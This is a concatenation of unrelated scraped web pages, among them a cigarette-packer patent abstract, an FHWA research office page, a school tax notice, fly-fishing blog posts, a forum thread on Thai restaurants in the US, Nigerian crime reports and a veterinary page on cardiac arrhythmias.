The utility model discloses a cigarette packer's merchant label cigarette case suction means, include two sets of suction nozzles, every group suction nozzle passes through the connecting rod respectively to be connected with the cam, realizes that the suction nozzle moves in the reciprocal absorption of rectilinear direction, and the motion angle for rise travel that two sets of suction nozzles correspond the cam is the same, and the angle of repose far away of the first cam that wherein first suction nozzle is corresponding is less than the angle of repose far away of the second cam that the second suction nozzle is corresponding. First suction nozzle moves earlier, will discuss the pulling of label cigarette case side, and the whole absorption of label cigarette case will be discussed in second suction nozzle motion after that, and reduced and overlapped the influence of merchant label cigarette case viscous force each other to absorbing of placing, the utility model discloses stability is absorb to the effective merchant of improvement label cigarette case, has avoided the waste of merchant label cigarette case, has reduced auxiliary material consumption, alleviates operator?labor intensity. | |
Office of Operations Research and Development
Advances the body of knowledge and technology to address national transportation goals.
- Promote transportation equity in all communities.
- Improve traffic efficiency, effectiveness, and safety.
- Address congestion.
- Address increases in traffic on different road types.
- Facilitate vehicle–infrastructure interactions.
- Develop intelligent transportation systems.
- Enable cooperative driving automation (CDA).
- Analyze, model, and simulate transportation systems management and operations (TSMO) scenarios.
Contributes
- Research, development, and technology program plans and projects.
- Demonstration field tests of technologies.
- Stakeholder needs, acceptance, and benefits related to new transportation operations products.
Supports
- Federal Highway Administration (FHWA) offices.
- FHWA Resource Center.
- Office of the Secretary of Transportation for Research.
- Intelligent Transportation Systems Joint Program Office.
Funds
- Highway Research and Development Program.
- United States Department of Transportation (USDOT) Intelligent Transportation Systems (ITS) Program.
- FHWA Exploratory Advanced Research Program.
- Small Business Innovative Research Program.
- Transportation Pooled Fund Program.
Cooperative Driving Automation (CDA)
CDA enables automated vehicles (AVs) to cooperate through communication between vehicles, infrastructure, pedestrians, cyclists, and other road users. The STOL is spearheading the R&D of CDA features, which, once deployed, have the potential to advance transportation safety, mobility, and efficiency.
Analysis, Modeling, and Simulation (AMS) Tools
Develops methods and tools to improve both the state-of-the-practice and state-of-the-art of traffic AMS to enable public agencies to make the best possible transportation operations and investment decisions.
Intelligent Transportation Systems (ITS) Technologies
ITS technologies are targeted to infrastructure and vehicles, as well as integrated applications between the two, to support the development of intelligent transportation systems. STOL research optimizes existing and develops innovative ITS technologies for deployment to power improvements in transportation safety, mobility, and reliability.
Truck Platooning
Supports advancing technologies that enable trucks to travel closely together to improve
on energy consumption while maintaining safety and traffic efficiency.
Capabilities and Resources
Turner-Fairbank Highway Research Center (TFHRC) Facility and Staff Expertise
Teams of scientists, engineers, and communicators who work on innovative, operations-related research in agile environments to advance transportation efficiency and safety and enable the deployment of ITS. Learn more about TFHRC research in the FHWA Research Project Search.
Saxton Transportation Operations Laboratory (STOL)
A state-of-the art research facility in TFHRC for conducting cutting-edge transportation operations research and development with the goal of accelerating transportation safety, efficiency, and mobility. Learn more about STOL research in the Project Directory. | https://highways.dot.gov/research/turner-fairbank-highway-research-center/offices/office-operations-research-development |
A public hearing will be held approx. 6:00 PM, August 25th, 2022 at Spokane Elementary School, 223 Kentling Avenue, Highlandville, MO 65669, at which time citizens may be heard on the property tax rates proposed to be set by the Spokane R-VII School District.
The tax rates are set to produce the revenues required from the property tax as shown in the budget for the fiscal year beginning July 1, 2022. Each tax rate is determined by dividing the amount of revenue needed by the current assessed value. The result is multiplied by 100 so the tax rate will be expressed in cents per $100 valuation.
Assessed Valuation (by categories)
Estimated
Current Tax Prior Year
Year 2022 Year 2021
Real Estate $ 67,132,790 $64,727,170
Personal Property 20,648,516 16,739,709
$ 87,781,306 $81,466,877
The following tax rates are proposed:
Amount of
Property Tax Property Tax
Fund Revenues Budgeted Rate (per $100)
Incidental $2,413,986 2.7500
Teachers $ 0 0.0000
Capital $ 495,262 0.5642
Debt Service $ 653,532 0.7445
$ 3,562,780 4.0587
New Revenue from New Construction and Improvements: $202,909
New Revenue from Reassessment: $16,629
Percentage of New Revenue from Reassessment: 0.62%
*Actual amounts may be affected by state assessed property income and changes in valuations after Board of Equalization.
*These calculations are based on a collection rate of 100%.
*These numbers are subject to change by the State Auditor’s office. | https://www.spokane.k12.mo.us/46099?articleID=111220 |
Cabin fever is winning over good judgement. Good judgement says stay at home as the river is high, fast and more rain is forecast today. With so few opportunities to fish I need to get out and I can’t keep using the weather as an excuse.
I throw the kit in the Land Rover and set off to a short beat on the Usk, a few miles above Abergavenny. It’s a late start and getting on for 9.30am when I leave. At the garage, where I’m looking for a sandwich and water for later, the lady is moaning about working on Good Friday. I smile sympathetically but unkindly I’m thinking, yes, rather you than me today.
I tackle up and make the short walk to the river where my mood takes a dip when I see the water. The features I remember can’t be seen. The top of the beat is a wide glide where the tail of a pool usually offers some skinny water which makes for a nice approach. From there you can fish the pool above with nymphs or a dry and then reach the faster water near the far bank. Today it all looks the same – quick and menacing.
I stroll to the bottom of the beat wondering what to do. Heavy nymphs I think, on a tight line. It’s deeper here than at the other end of the beat and as I slip into the water it’s already above my waist.
As I fish my way out into the river, I soon realise that I need another plan. Well before the mid point I’m struggling with the flow and all my focus is on staying on my feet. I sit on the bank and contemplate. Off goes the specialist nymph line and on with a regular 4 weight. I tie on an elk hair caddis and suspend a pheasant tail underneath, thinking that I’ll be able to cover more of the water whilst staying out of the strongest flow.
Over the next hour I manage three small brownies, the best of which is 10″, but it’s slow going. At least the forecast rain is absent and there’s little wind too. I fish half the beat and I take a break.
As I’m staring down river I see a large head break the surface close to where I aborted my earlier wading. My first thought is ‘what a monster fish’ and then I realise it’s an otter and I’m pleased no one is here to witness my mistake.
It’s not the first otter I’ve seen on the Usk, but this one is happy to entertain me for nearly 20 minutes. I play ‘creepy uppy’ along the bank trying to get close enough for a picture. I feel like I’ve snuck into a theatre without paying and I’ve got a front row seat. I’m struck by how effortlessly she manages the river, ducking, diving and chattering away oblivious to me. Then suddenly she spots me and with an enormous splash is gone.
I head back to the top of the beat and select a spot where the flow is more manageable. I think maybe a lighter weight nymph will be better and with no surface activity I start prospecting the water.
Did I just see a little rise about 20ft upstream? Difficult to spot in this condition and now with some light drizzle too. There it is again, definitely a fish. I take a few steps to the right so that I can cover the spot with a little upstream mend and within a few seconds the caddis disappears and I’m in. Initially it doesn’t feel special but then I realise it’s a good fish and it charges off to the deeper water.
After a good fight I get it to the net and let it recover. At sixteen and a half inches nose to fork, it’s one of my best Usk trout, and in top condition. This one fish is worth the trip, let alone it’s three little cousins and watching the otter.
Back at the car I chat with the owner who doesn’t seem to share my excitement about the otter. He’s lost all the goldfish from his pond and blames his rent free tenant. Me, I think its a small price to pay. After all, who needs a pond when you own a stretch of the Usk?
There is the opening day of the season and then there is my personal opening day – the day that marks my first opportunity each year to fish for wild brown river trout. This is that day.
Over the years I’ve learned to temper the enthusiasm with a measure of realism born from experience. There have been a few memorable, halcyon opening days and a few that fell short of expectation. Today is one that will simply fail to materialise.
The snow that fell overnight is continuing to fall as I take my first peak at the day. There is an instant realisation that this seasons opening day is postponed. I’m not a fair weather angler, but the heavy snow and strong wind is not what I have in mind and I’m resigned to doing something else with my morning.
I think the dog walk will be extra long. The snow is not as deep as a few weeks ago and I know the Land Rover will get me out, so I’m not confined to the hills and woods around the house. I think I’ll head to the river – without my rod.
The Usk has something to offer in every Season. Even now when Spring is confused by the refusal of Winter to leave, the river is determined to impress. Heavy rain that preceded the snow is pushing the flow through at a pace I would not like to test. I enjoy wading, but I know my limitations.
Today, even Ollie, our daft retriever has enough sense of self preservation to stay out of the water.
The snow stops and I look for any signs of fishiness. Nothing to report. The river offers no hint of its (deserved) reputation for early season trout. I contemplate the coming week and consider if it affords me a chance to open my season or will it be next weekend?
As I wander down-stream I continue to explore every inch of the current. I rehearse where the fly will land and how the line will track. I note where I’ll stand to fish the seam below a boulder and where I might try a left handed cast to avoid the tree trout.
My eye catches a little back eddy and I see a distinct ring. It’s almost certainly something that’s fallen from the overhanging branch, but I know it’s a hulk of a brownie that is going to spend the next few days working its way upstream a couple of miles. I’ll be waiting for him on my opening day.
Last Of The Seasons Snow?
Simon on A Lesson Learned….. | https://fishingfortrout.blog/2018/03/ |
Inside the ruins!
Inside the ruins! is the third story of chapter three in the game Wario Land II. It takes place inside the ruined remains of an ancient civilization deep at the bottom of the sea.
This level is notable for probably being the shortest level in the entire game since the goal door can be found by just standing on the slope at the start and press down to roll all the way. However, the level houses many secrets, and the player has to master Wario's rolling technique to find them all.
Contents
Encountered enemies
Featured conditions
Hidden treasure: Coral
To get the treasure of this level, the Coral, the player must jump up from the goal door and reach the slope above to be able to roll. The player how has to have Wario jump timely so he breaks the right blocks and thereby finds the right path to the treasure door. Wario should smash through the first wall and before reaching the next slope, jump up to break through another wall. The player has to jump over the next gap and then immediately jump again to avoid getting stopped by a slope. Wario smashes through another wall. The player now should enter the next gap and make Wario stop rolling somehow. The door in this area is the treasure door. The player can walk back to the door without problems if they miss. | https://www.mariowiki.com/Inside_the_ruins! |
Topics in this article include:
OverviewModerators can record a session to view later, send to those unable to attend the session, or save for archival purposes. Recordings capture the audio, video, and any content that is shared during a session. Recordings also capture any real time captions or subtitles available during the session. If there are more than one captions available during the session, the recording will capture only the first one. Recordings do not capture private chat messages, the timer, personal notes, or anything that occurs in a breakout room.
Record Sessions
For more information see Record Sessions.
View and Download Recordings
Recorded sessions are saved as MP4s and include audio, any content shared or active speaker video, and the captions entered during the live session.
Please note the following:
- If your session had more than one caption track, only the first available one is captured.
- Only moderators can record sessions.
- Everyone can view the recordings from any device as often as they want. There are no view limits.
- Recordings need to be converted into a playable format before viewing. The first time a recording is accessed the conversion begins. It may take a few minutes but once is has been done the recording can be viewed by everybody.
Note: If you want users to download the recordings, you MUST allow session recording downloads for each session.
To view or download recordings, navigate to myLesley, go to Blackboard Collaborate Ultra and select the tool menu.
Select Recordings for a list of all recordings.
Locate your recording and click on the menu button to the right.
This will open a menu.
- Select Watch Now to watch your recording
- Select Download to download your recording
- Select Copy Link to copy the link to send via email or post in myLesley
For more information, see Session Recordings. | https://lesleyuniversity.freshdesk.com/support/solutions/articles/4000085920-blackboard-collaborate-ultra-recordings-moderator- |
In This Section
This page shows Council and Fulton Hogan roadworks that may result in significant detours and delays over several days or weeks.
They do not identify roadworks being done by other agencies, such as power and telecommunications.
Most of our roading projects take place over summer, but we carry out some routine maintenance to our Three Water network in winter.
Please wait while we load your map...
Our contractors Fulton Hogan are resurfacing the intersection of Oxford and Wyndham Streets in Ashhurst. They’re also installing a new drain and widening part of the road at the same time.
The work will be started on 28 June, and is expected to take until late July. Working hours are between 7am-6pm, Monday-Friday, with the intersection being reopened outside of these times. This work is weather dependent, so, if it gets too wet, it may be delayed a few days.
This will improve the surface of the intersection, as well as stormwater drainage around the intersection.
Map indicates the planned road closures at the intersection of Oxford and Wyndham Streets in Ashhurst.
The entrance to the intersection from Wyndham Street, coming from Cambridge Avenue, is closed during working hours. The rest of the intersection will remain open under a stop/go system.
You’ll still be able to get in and out of your home or business at all times, but there could be the odd delay at times. All residents will need to follow the traffic management set up, which may require you to take a slightly different route to avoid the road closure.
Outside of work hours, the intersection will be fully open as normal.
We're creating a people-friendly route that connects Central Energy Trust Arena to the city centre.
Part of Cuba Street is reduced to one lane of traffic during construction – traffic can enter Cuba Street from the Rangitikei Street intersection. We’re lucky the street is wide enough to allow us to do this.
All footpaths remain open. This means it is still easy for everyone to come down and support businesses.
Construction started in July on the side closest to the Square, before flipping over to the side nearest to Briscoes and ANZ.
Visit the Cuba Street redevelopment page for more details.
Two lanes of traffic will be maintained along Ferguson Street at reduced speeds of 30 km/h.
As work progresses down the street, it’s likely that two intersections will be affected for periods of construction.
The intersection at Linton Street will be temporarily closed and traffic diverted. The same will happen when work is near the South Street intersection. You’ll still be able to access these two streets from College Street, just not Ferguson.
Access to businesses and homes will remain unaffected. For more visit Ferguson Street safety improvements
Map showing where the footpath is closed and the location of the temporary pedestrian island.
We've begun work on our new residential subdivision at Whakarongo, which has meant closing the footpath directly in front of the subdivision. We understand this will affect Whakarongo School students, so we're installing a temporary crossing point near the site (you can see this on the map) for the duration of this construction period.
To access the shared pathway, people who usually use the subdivision side of the footpath will need to cross to the other side at the temporary crossing, walk towards the railway crossing, and cross the road again at the existing crossing point.
During construction at Whakarongo we'll have a number of trucks coming and going throughout the day. This, teamed with the footpath being closed and the need for children to cross the road, means we've dropped the speed limit to 30km/h between Ivy Lane and Brooklyn Heights Drive.
Please observe any signs, watch out for children, and drive with care.
NZTA is responsible for state highways. Visit its website for information about the work it's doing. There's also a journey planner to help you plan your trip, including updates on delays, roadworks and road closures.
Help us to keep our roads and footpaths safe by reporting problems with roads and footpaths. You can fill in a form, email us or call us on 06 356 8199, 24 hours a day, seven days a week, 365 days a year. | https://www.pncc.govt.nz/Services/Transport-roading/Roads-and-footpaths/Roadworks-and-road-closures |
How Much Sugar Is Equal to Honey?
Last Updated Mar 25, 2020 12:55:26 AM ET
To substitute honey for granulated sugar in a recipe, use one-third to one-half less honey than the amount of sugar called for in the recipe. Honey is twice as sweet as granulated sugar, so it is necessary to reduce the amount in recipes.
When replacing sugar with honey in baked goods, reduce the liquid called for by one-fifth, because honey is 18 percent water. Honey is used in the baking industry to keep baked goods fresh and moist, since it can absorb and retain moisture. To prevent honey from sticking to measuring utensils, spray them with cooking spray before measuring the honey.
More From Reference
Will 5G Impact Our Cell Phone Plans (or Our Health?!)
The Secret Science of Solving Crossword Puzzles
Racist Phrases to Remove From Your Mental Lexicon
Is the Coronavirus Crisis Increasing America's Drug Overdoses?
Fact Check: What Power Does the President Really Have Over State Governors? | https://www.reference.com/world-view/much-sugar-equal-honey-b14df447de098bb5 |
© Copyright of Ministry of Education, Science and Technological Research Sarawak Best viewed with IE 9.0+, FF 3.6+ in 1024 x 768 screen resolution.
File photo of Mara Junior Science College (MRSM) students working in a science lab.
KUCHING: Students in Forms 4 and 5 will be given the option of choosing from four packages of core subjects and electives when the new school term starts next January, Education deputy director-general Habibah Abdul Rahman said.
She said in a Malaysiakini report today that the electives would depend on the availability of teachers or facilities for those subjects in each school.
Clarifying earlier news reports that the arts and science streams would be abolished next year, Habibah told the press in Kuala Lumpur that the streaming policy had in fact been abolished by the Education Ministry in 2000.
“We don’t arrange the students according to streams but allow students to choose electives according to packages to convenience the schools and students. Schools will not be able to offer all electives because it depends on the facilities and teachers available at the school,” she said.
According to Malaysiakini, the packages are: .
Science, Technology, Engineering and Mathematics (STEM) A:Core subjects, three pure science subjects and Additional Mathematics. Students can add up to four other electives, including languages.
STEM B:Core subjects, two pure science subjects, Additional Mathematics, at least one applied science or non-science elective.
STEM C:Core subjects, two applied science or technical elective or one vocational elective.
Humanities and Arts:Core subjects and electives from languages, Islamic Studies, arts and humanities and/or one Stem elective. (Vocational election not included in Stem elective.)
Habibah said physical and health education would be compulsory for all students, but any testing would be done at school level only.
She added that History and Bahasa Malaysia remain compulsory-pass subjects for the Sijil Pelajaran Malaysia (SPM) examination for Form 5 student, which still has a 12 subject limit for each candidate.
The core subjects are Bahasa Malaysia, English, Mathematics, Science (except for students who undertake pure science subjects), History, and Islamic Studies /Moral Studies (except for students who undertake Islamic studies-related electives).
Habibah said the ministry was offering packages instead of allowing a free for all so students could meet tertiary education institutes requirements for entry to specific courses.
Students would also be counselled on which package suited them according to their Form 3 PT3 results, in-school assessments and psychometric test results, she said.
Habibah said the ministry would like schools to become like universities, where students could determine their own timetables based on the subjects enrolled, but she admitted that there were currently limitations in the country’s public schools.
“Schools can arrange for minimal movements if students take different packages, but they will still (mostly) sit in their classes rather than have the classes fixed (and the students move),” she said. | https://mestr.sarawak.gov.my/modules/web/pages.php?mod=news&sub=news_view&menu_id=&sub_id=&nid=447 |
Life is humming on board. During the rest hours the guitar sounds on the deck. One can also enjoy movies or admire the magnificent sea. The fair wind filled the sails, and Pallada's speed reached 12 knots. Pallada has already sailed 18.6 thousand nautical miles, she went 25% of the route under sail. During the previous day, 173 nautical miles were covered.
The Indian ocean which seemed to be calm at first, surprised the Pallada with pitching and rolling in a short while. The sailing training ship of the Agency is passing Madagascar and proceeding to Mauritius, Port Louis, having caught favourable wind. The frigate left Cape Town on March 19 and is going to call at the port of the tropical island on April 6.
The list that reached 30 degrees and stopped deck works, but did not cancel lessons at classrooms and did not prevent the guys from having a great lunch of of hot cheese soup and calamari risotto. The morning heavy shower helped to reduce ambient temperature to comfortable 24 degrees. | http://russiansails2020.ru/en/news/novosti-pallada/1065/ |
As a symbol, white is the opposite of black and often represents light in contrast with darkness. White is the colour most often associated with innocence, perfection, simplicity, honesty, cleanliness, the beginning, the new, neutrality, lightness, and exactitude. It is also the perfect blank canvas for layering bright or muted colours. | http://www.ashestore.com.au/browse-or-buy/white/ |
Thai restaurants in the US seem quite common (at least where I live). Maybe not on every street, but I see them frequently. On the other hand, I’ve never seen a Laos restaurant or a Cambodia restaurant. I do see a fair number of vietnamese restaurants, but I assume that’s related to people who came over during the vietnamese war.
How come Thai restaurants are so much more common in the US than their immediate neighbors Laos and Cambodia? Was there some factor that drove more Thai immigration to the US that somehow didnt affect the neighboring countries?
Thai restaurants in the US seem quite common (at least where I live). Maybe not on every street, but I see them frequently. On the other hand, I’ve never seen a Laos restaurant or a Cambodia restaurant. I do see a fair number of vietnamese restaurants, but I assume that’s related to people who came over during the vietnamese war.
I doubt it has much to do with the number of immigrants. Food styles are trends, and Thai is one that caught on. But in terms of immigration, there is a strong formal cooking tradition in Thailand that produced some well trained chefs who came to the US to open or run restaurants. I don’t know if the same holds for Cambodia and Laos.
There are cambodian restaurants. It just depends on the city. But yeah, there are more Thai. Maybe because fewer of the Thai people immigrated to the USA as refugees? Maybe they came with more resources.
Perhaps the public in general has a better concept about what Thai cuisine is like.
In my neighbourhood, there is a Restaurant by the name of “Shanghai Express” but the owner and all the staff are Vietnamese. It’s not a fancy place and while they do have some Vietnamese dishes on the menu, they offer mainly traditional Chinese food (the way it is known in the West, which is very different from authentic Chinese cuisine).
I guess they do it to be more appealing to mainstream customers who normally would not patronize the more exotic ethnic restaurants.
It’s a mixture of all of the above, but mostly it’s because of the conditions under which the various populations originally came to the U.S. The Thai who came (during the war in Vietnam) were prepared to start small businesses, with sufficient capital and/or resources. The Cambodians and Laotians came as refugees, as Donnerwetter notes…
However, many Vietnamese came as refugees, too, but they came in such large numbers, they were able to attract enough initial clientele to create successful restaurants.
Also, as mentioned above, Cambodian and Laotian cuisines aren’t as distinct as Thai cuisine, which could generate an identity that North Americans could easily identify, and which was easily promoted. When Laotians and Cambodians do start restaurants, they often promote them as restaurants that also serve Thai food.
Cambodians, by the way, more so ended up starting doughnut shops, instead. (At least in L.A.)
Understand that Laos is a small landlocked country. It’s population is estimated at about 6.5 million. The Laotian culture is heavily influenced by Thailand. Laotians watch satellite TV that is sent to them unscrambled from Thailand stations. In remote villages there will be satellite receptors.
There is a bit of an identity crisis in Laos because of the Thai influence. Read “Another Quiet American”. http://www.amazon.com/Another-Quiet-American-Stories-Life/dp/9748303683
Cambodia is also relatively small in population, less than 15 million. It is heavily influenced by Vietnam and China.
Vietnam has over 90 million people. Thailand, about 64 million. China, try counting them.
It’s not surprising that China, Japan, Vietnam and Thailand would have much more influential cuisine. People from those countries have had a much easier time making it to the US for a variety of reasons.
And yes, as it was pointed out, a restaurant run by Vietnamese, in order to expand the menu will serve what Americans consider traditional Chinese dishes.
There’s more money to be made in Thai restaurants. How many Americans go out looking for Laotian food?
This is one of the same reasons why the majority of Japanese restaurants in the US are run by non-Japanese (usually Koreans). It’s a bigger market.
Cambodia doesn’t have much of a distinct cuisine compared to its neighbors. I mostly had fried rice and some Vietnamese-style hoagies when I was there. The most unique dish I came across was noodles with crab.
I could imagine going to a Lao restaurant. It would serve Lao and Issan (northeastern Thai) cuisine (e.g. Laap). But they might as well just open a Thai restaurant and also serve some Lao dishes.
Another factor is whether restaurants are common within the country itself. There are some Burmese restaurants in the U.S., but they’re not very common. Partly this is because there aren’t very many Burmese restaurants in Burma (or whatever the country is calling itself these days). Burmese food is a home cuisine. If Burmese want to eat out, they go to Chinese restaurants (or so I’ve been told).
There are thus a number of factors determining how common various types of restaurants are in the U.S. - the population of the country, the proportion of those people who emigrated to the U.S., the degree to which people in that country consider restaurants of their cuisine to be important institutions, whether that cuisine has become hip in the U.S., etc. Another issue is that you may not actually know what sorts of restaurants are common unless you really look hard for them. There are cuisines that do have a reasonable number of restaurants specializing in them, but unless you are of that ethnic group or you know well people who are, you might never hear of them. Some restaurants just aren’t hip, and some of them don’t want to be hip. They don’t have, and sometimes don’t want, lots of customers who aren’t of their ethnicity.
Incidentally, you might want to read Tyler Cowen’s new book, An Economist Gets Lunch or the recent article by him in The Atlantic (where the point is actually made more clearly). He recommends that people eat at Vietnamese restaurants rather than Thai ones. Vietnamese restaurants are cheaper for the same quality. Thai restaurants have been forced to Americanize their food in order to stay popular. In particular, this means that they make the food sweeter and with less exotic flavorings.
I used to live practically across the street from a Laotian restaurant. This was in a mid-sized Midwestern city. IIRC their sign actually said they were a Lao-Thai restaurant, but the name of the place was Vientiane (after the capital of Laos).
Your example kind of highlights a point I was going to make. If your food is not all that different from Thai, you might want to describe it as Thai anyway, because more Americans are out looking for that kind of food. Then you can do some kind of fusion or multiple menu solution.
Up here in the Pacific NW, it’s very common to find “Teriyaki” shops that serve everything. While the name makes you think Japan, it’s not unusual to find China, Thailand, Korea and/or Vietnam represented on the same menu in different ways. I know of one such restaurant that offers miso, wonton soup and pho in the “soup” section of the menu.
In a place like that, I might have sampled the fare of Laos or Cambodia and not even realized it.
I find that many of the Thai restaurants in my area are run by non-Thais anyway, which may explain why their Thai food kind of sucks. I wish that they’d stick to their core competency, then I might be interested to eat there more often.
Laos used to be a part of Thailand, fwiw, and in Thailand there are many Isaan (Isarn) restaurants. I ate at a couple of them this past week. Laos and the Isaan region of Thailand have a similar cuisine.
If Andrew Sullivan is to be trusted, in his special where he explored some of the Cambodian places in Orange County, I think the “best” kinds of Cambodian foods might be a bit out there for many Americans. Too much blood in the food. Thai cuisine also has this, with stuff like “fish maw” and “fish kidneys” appearing on the menus in Thailand, but they either keep it off the menu or have a special Thai menu that’s written in Thai script.
That’s not really an answer, it just raises the question of why Thai cuisine caught on and Lao cuisine didn’t. I mean, at some point, Thai cuisine was a rarity in the U.S. (and I’m given to understand that Lao restaurants exist in the big cities, for that matter.)
And around here the workers in the sushi places speak Chinese, not Korean.
Homer Simpson endorsed Thai food [/thread]
It’s not clear why Thai restaurants suddenly became hip in the U.S. at some point. Several sources I’ve consulted say the popularity of Thai restaurants started in California in the 1980’s. Sometimes it’s just a matter of luck how such trends start. Lao and Cambodian restaurants were never very common, but the strange thing is the decrease in the number of top-level Vietnamese restaurants in the U.S. in the past ten or fifteen years. There are still plenty of less expensive Vietnamese restaurants though. For a short period it appeared that Vietnamese restaurants might become as hip as Thai ones, but then they started to fade out and never reached that level of popularity.
Could the fact that the US stationed large numbers of troops in Thailand and Vietnam have something to do with it? (There were at least five air bases in operation during the Vietnam war). The large number of repatriating servicemen – we all served one year rotations in country – would have provided a large base of potential customers.
I live in Thaitown, and I’ve tried just about every one of the restaurants here. The “hole-in-the-wall” places (where they sometimes have to search around for the English menu) serve these things. There are a couple of places that cater to the folks who “venture in” from the Westside, and while they might serve them if you ask, they definitely won’t put them on menu.
I actually saw this with Greek food when visiting Boston. Living outside of Chicago, I’m used to seeing Greek restaurants, so when my husband and I visited Boston a few years back, we decided to find a Greek restaurant. Turns out they all seem to be advertised as “Mediterranean” restaurants, and typically serve Greek and Italian cuisine from what I saw. Even a restaurant with a name like Ithaki gets labeled first as “Mediterranean” but only secondarily as Greek, even with a heavily Greek menu and only a few inclusions of things like fettuccine under more traditionally Greek toppings/sauces. (BTW, great food, at least as of that visit a few years back.)
So my guess was, and that seemed to be backed up by talking to friends who lived in the area, that people there wouldn’t know what to expect if they saw “Greek” but seeing “Mediterranean” think “kinda Italian” and try it out.
Madison, or a suburb of Minneapolis? I think both of them said much the same thing, but my memory isn’t cooperating.
I think this is a pretty good explanation. Is there any example of a small (< 10 million) country that has really popular food? Jamaica, maybe? | https://boards.straightdope.com/t/why-is-thai-food-more-common-in-the-us-than-say-laos-or-cambodia/619521 |
The Police Command in Nasarawa State says it has arrested a 38-year-old mechanic, who allegedly stole a white Toyota Hilux van belonging to a leading company from Abuja on Friday.
The command’s Police Public Relations Officer (PPRO), Mr. Ramhan Nansel, told newsmen in Lafia that the vehicle with registration number, APP 68 XM, was stolen from where it was packed at Kurudu, Federal Capital Territory (FCT) Abuja, Friday (today) morning.
“Upon receipt of the information, the Commission of Police, Bola Longe, directed operatives of the command to comb all the nooks and crannies of the state in order to recover the stolen vehicle and arrest the perpetrator of the act if found anywhere within the state.
“In compliance with the directive, police operatives attached to Akwanga division on stop-and-search operation intercepted the vehicle along Akwanga-Keffi road, arrested the suspect and recovered the vehicle as exhibit,” he said.
According to him, the suspect, who resides in New Nyanya, Karu Local Government Area of the state, had confessed to committing the crime and investigation is ongoing to unravel other accomplice, NAN reports.
Metro
Niger Police/Vigilantes nab four for vandalizing railway tracks
The Niger State Police Command in connection with vigilantes in Bosso Local Government Area have arrested four suspects for allegedly vandalizing 40 railway tracks in the state.
The suspects were caught in two Hijet pickup vans loaded with the items along Maikunkele-Zheko road on 9th of January, 2021.
Confirming the development, the state Police Public Relation Officer, PPRO, Wasiu Abiodun, said the Police/vigilante operatives attached to the area on patrol arrested four suspects
According to him, “the suspects were arrested with 41 pieces of vandalized rail tracks loaded in two Hijet pickup vans with Reg. No. XG 668 AA and RSH 742 XB.”
The suspects included; Adamu Abdullahi age 30yrs, Ahmadu Sa’adu age 25yrs of Maitumbi Minna, Ojo Okuo age of Gbaiko village and Rabiu Yunusa age 35yrs of Angwan Sarki, Paida Minna.
He explained that during interrogation, Adamu Abdullahi confessed to have bought the rail tracks from one Hussani presently at large and contacted Ojo Okuo who cut the rail tracks to movable sizes.
” Ahmadu Sa’adu and Rabiu Yunusa were conveying the tracks from Jangaru village to Kasuwa Gwari Market Minna with the said vehicles.”
The police spokesperson further added that the suspects will soon be arraigned in court for prosecution.
Metro
Sex party organizers arrested in Bauchi
The Bauchi State Hisbah has confirmed the arrest of six youths who specialized in organizing sex orgies and fomenting trouble in Dolam village, in Tafawa Balewa Local Government Area of the state.
Malam Aminu Idris, the Permanent Commissioner in-charge of Hisbah and Sharia Implementation, who confirmed this to News Agency of Nigeria (NAN), identified the culprits as Abdurrauf Kabir 25, Dabo Yusuf 26, Abdurrazak Isah 24, Habu Umar 27, Yaron Nuhu-Maikaji 30, and Abdurrashid Shehu 31.
He said they were using a primary school building in the area to commit the act.
According to him, the culprits were in the habit of organizing disco parties, locally called Gwaidu, during which they lured young girls into illicit sexual relationships, while at times they used force to intimidate innocent people.
Idris said the attention of his department was drawn by the local Hisbah office in the area, after which the office swung into action and arrested all those involved.
After discreet investigations, the commissioner said, the state Hisbah office summoned the parents of the culprits, counseled them both and made them to signed an undertaking against repeating the offence.
Idris said the Hisbah department would, hence forth, not hesitate to prosecute such culprits in a competent court of law, stressing, ”as a Lawyer I will do everything possible to ensure that our existing laws were not flagrantly violated”.
He appealed to the state government to hasten the appointment of the state Hisbah Board, as well as provide additional financial and logistics support to the department to enable it perform optimally. | https://dailypost.ng/2020/09/25/police-arrest-suspected-abuja-car-thief-in-nasarawa/ |
In 2021, Myanmar had the lowest average price per smartphone at only around 143 U.S. dollars per unit. Ranked second at around 50 dollars more and a price around 194 U.S dollars per unit was Indonesia. The highest on average price for a smartphone was around 441 U.S. dollars in the Brunei Darussalam market.
Average price of smartphones in the Asia-Pacific region in 2021, by country (in U.S. dollars)
Exclusive content
Other statistics on the topicConsumer electronics in the Asia-Pacific region
Use Statista now: unlimited access to all content
Statistics on " Smartphone market in Taiwan " | https://www.statista.com/forecasts/1262406/asia-pacific-smartphones-price-market |
- Main Stable with 8 Concrete Stalls.
- Training Barn with 9 stalls including 3 with outdoor runs. Contains an indoor 40' round pen.
- 50' outdoor round pen.
- 160' outdoor round arena with lighting.
- 100' x 200' outdoor arena. We can section this into a 100' x 100' pen for cutting.
- Between the two arenas are cattle working pens and equipment. | http://littlecreekquarterhorses.com/ranch-tour/facilities.aspx |
A cardiac arrhythmia (abnormal heartbeat) is any abnormality in pace, intensity, or regularity of a pet’s heartbeat. Though not every arrhythmia is cause for concern, others can be an indication of a serious, life-threatening disease. Cardiac arrhythmias can be caused by genetic abnormalities, environmental factors, or breed predisposition. They can occur in all canine and feline breeds, ages, and genders.
A pet’s heartbeat should be regular and strong. If beating slightly alters while breathing in and out, this can be caused by an unfamiliar environment or momentary stress. Abnormalities including an elevated, irregular or very slow pulse can also indicate anemia, lung disease, or a failure of circulation. The only way to determine the underlying issue is to have a complete cardiac workup done. Until the origin is determined, an arrhythmia should not be taken lightly. The symptoms of an arrhythmia may come and go; regardless of whether your pet is currently showing indications of an irregular heartbeat, we recommend ensuring there are not any serious underlying cardiac issues.
Possible indications of a heart arrhythmia:
Diagnosing heart arrhythmia
In diagnosing an arrhythmia, a full physical will be performed with a complete blood analysis. Blood work can establish whether a pet has anemia and can also detect whether the organs are working properly. An EKG can detect the arrhythmia. Chest X-rays help to determine if heart disease or heart failure has occurred. An echocardiogram will assess heart function and structure.
How is heart arrhythmia treated?
Once a diagnosis has been reached, we will discuss the treatment options. Medications can often help control an arrythmia, depending on the underlying cause, your pet’s age, and breed.
There are two Surgical options, both of which must be performed by a veterinary cardiology specialist. Catheter ablation destroys the defective electrical pathways within and around the heart that cause the arrhythmia. It involves inserting a catheter into the faulty blood vessel and using electrical impulses to destroy tissue. This method has been used in canines successfully, but has yet to be tested in felines. Implanting a pacemaker is similar to a human implant, using the pacemaker to control cardiac rate and rhythm. Pacemakers have only been used in dogs.
If you have any questions, please contact our office. | https://www.edinburgvet.com/services/pet-health/cardiovascular-health/cardiac-arrhythmias/ |
